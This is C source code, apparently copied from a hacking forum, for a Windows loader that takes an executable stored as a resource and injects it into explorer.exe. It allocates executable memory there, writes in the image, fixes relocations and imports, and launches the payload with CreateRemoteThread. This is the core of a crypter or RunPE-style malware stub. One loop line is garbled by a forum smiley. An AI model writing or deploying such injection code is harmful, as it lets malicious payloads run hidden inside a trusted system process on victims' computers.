Code:
//Press Thanks to USDL :)
//Press Thanks to USDL :)
//Press Thanks to USDL :)
#pragma comment (linker,"/NODEFAULTLIB")
#pragma comment (linker,"/ENTRY:main")
#include <windows.h>
#include <Tlhelp32.h>
#include "resource.h"
int main()
{
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INTH;
PIMAGE_SECTION_HEADER ISH;
//Lets load the resource
HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE");
DWORD ResourceSize=SizeofResource(NULL,hResource);
HGLOBAL hGlob=LoadResource(NULL,hResource);
LPSTR lpFileMaped=(LPSTR)LockResource(hGlob);
//obtain the DOS and PE headers
IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0];
INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew];
DWORD PID=0;
HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pInfo;
pInfo.dwSize=sizeof(PROCESSENTRY32);
//obtain explorer.exe's PID
Process32First(hSnapshot,&pInfo);
for(;lstrcmpA(pInfo.szExeFile,"explorer.exe"):lol:
{
Process32Next(hSnapshot,&pInfo);
}
CloseHandle(hSnapshot);
PID=pInfo.th32ProcessID;
//Open the process we will inject to
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID);
//Create a buffer the size of "SizeOfImage", which we will load into the executable
LPSTR ExeBuffer=(LPSTR)VirtualAllocEx(hProcess,0,INTH->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
//Copy the PE and DOS Header to the Buffer
WriteProcessMemory(hProcess,&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders,0);
//Copy the sections VirtualOffsets into the buffer
for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++)
{
ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i];
WriteProcessMemory(hProcess,&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData,0);
}
//Calculate the Delta from the address of the buffer and the ImageBase
DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase);
//------------------------------------------------------------
/* -Relocate the reloc base in the executable <img src="http://zero.serhackernoesilegal.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley"> - */
//------------------------------------------------------------
//If there isn't a relocationbase then we leave
if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0)
{
MessageBoxA(0,"No hay relocation table!",0,0);
return false;
}
//Get the ImageBase Relocation
//Copy the ImageBase Relocation of the data from the process into a buffer
//to work more comfortably
PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)GlobalAlloc(GPTR,sizeof(IMAGE_BASE_RELOCATION));
PIMAGE_BASE_RELOCATION PIBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);
//Loop through all the entries
for (DWORD n=0;IBR->VirtualAddress>0;n++)
{
//Obtain the RelocationBlock
LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress);
//Obtain the first entry in the block
LPWORD RelocationEntry=(LPWORD)((LPSTR)PIBR+sizeof(IMAGE_BASE_RELOCATION));
//loop through all the entries
for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++)
{
WORD valor;
ReadProcessMemory(hProcess,RelocationEntry,&valor,2,0);
//Get the 4 bytes that define the type of relocation
DWORD type=valor>>12;
//Get the 12 bytes that define the address of the Relocation
DWORD offset=valor&0xFFF;
//If the type of relocation is relative to the baseaddress, we add the delta to it
if(type==IMAGE_REL_BASED_HIGHLOW)
{
//Add the address which depends on the original imagebase
//from the delta with the imagebase and our base address
LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset);
DWORD NewValue;
ReadProcessMemory(hProcess,newAddr,&NewValue,4,0);
NewValue+=Delta;
WriteProcessMemory(hProcess,newAddr,&NewValue,4,0);
}
}
//Loop to the next block
PIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)PIBR)+IBR->SizeOfBlock);
ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);
}
GlobalFree(IBR);
//---------------------------------------------------------------------
/* -Load the values from the IAT to call the APIs- */
//---------------------------------------------------------------------
PIMAGE_THUNK_DATA ITD;
PIMAGE_THUNK_DATA PITD;
PIMAGE_IMPORT_BY_NAME IIBN;
//Check if there is an Import Data Descriptor
if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0)
{
//Obtain the Import Data Descriptor
//Copy the Import Data Descriptor from the data in the process to a buffer to work with
PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_DESCRIPTOR));
PIMAGE_IMPORT_DESCRIPTOR PIID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);
//Loop through all the imported Dlls by the executable
for (;IID->Name;)
{
//Obtain the address of the dllname
DWORD szName=0;
CHAR miByte=1;
for(int i=0;miByte;i++)
{
szName=i;
ReadProcessMemory(hProcess,ExeBuffer+IID->Name+i,&miByte,1,0);
}
//Get the dll name
LPSTR lpName=(LPSTR)GlobalAlloc(GPTR,szName+1);
ReadProcessMemory(hProcess,ExeBuffer+IID->Name,lpName,szName+1,0);
//Load the Dll
HMODULE hLib=LoadLibraryA(lpName);
//Get the address of the first member from Image Thunk Data's array
PITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk);
ITD=(PIMAGE_THUNK_DATA)GlobalAlloc(GPTR,sizeof(IMAGE_THUNK_DATA));
ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);
//Loop through all the API imports
for (;ITD->u1.Ordinal;)
{
miByte=1;
//Obtain the address of the API name
for(int i=0;miByte;i++)
{
szName=i;
LPSTR puntero=ExeBuffer+ITD->u1.Function+2;
puntero+=i;
ReadProcessMemory(hProcess,puntero,&miByte,1,0);
}
//Load the Image Import By Name to get the name
IIBN=(PIMAGE_IMPORT_BY_NAME)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_BY_NAME)+szName);
ReadProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,IIBN,sizeof(IMAGE_IMPORT_BY_NAME)+szName,0);
//Get the address of the function and save it in the IAT
DWORD lpAPI=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name);
//WriteProcessMemory(hProcess,ExeBuffer+IID->FirstThunk,&lpAPI,4,0); /* Error HERE!*/
WriteProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,&lpAPI,4,0);/* Error FIXED!*/
PITD++;
ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);
}
PIID++;
ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);
GlobalFree(lpName);
GlobalFree(ITD);
}
GlobalFree(IID);
}
//Obtain the entry point of the executable that we loaded in the buffer
DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint;
//Call the entrypoint
CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)EntryPoint,0,0,0);
return 0;
}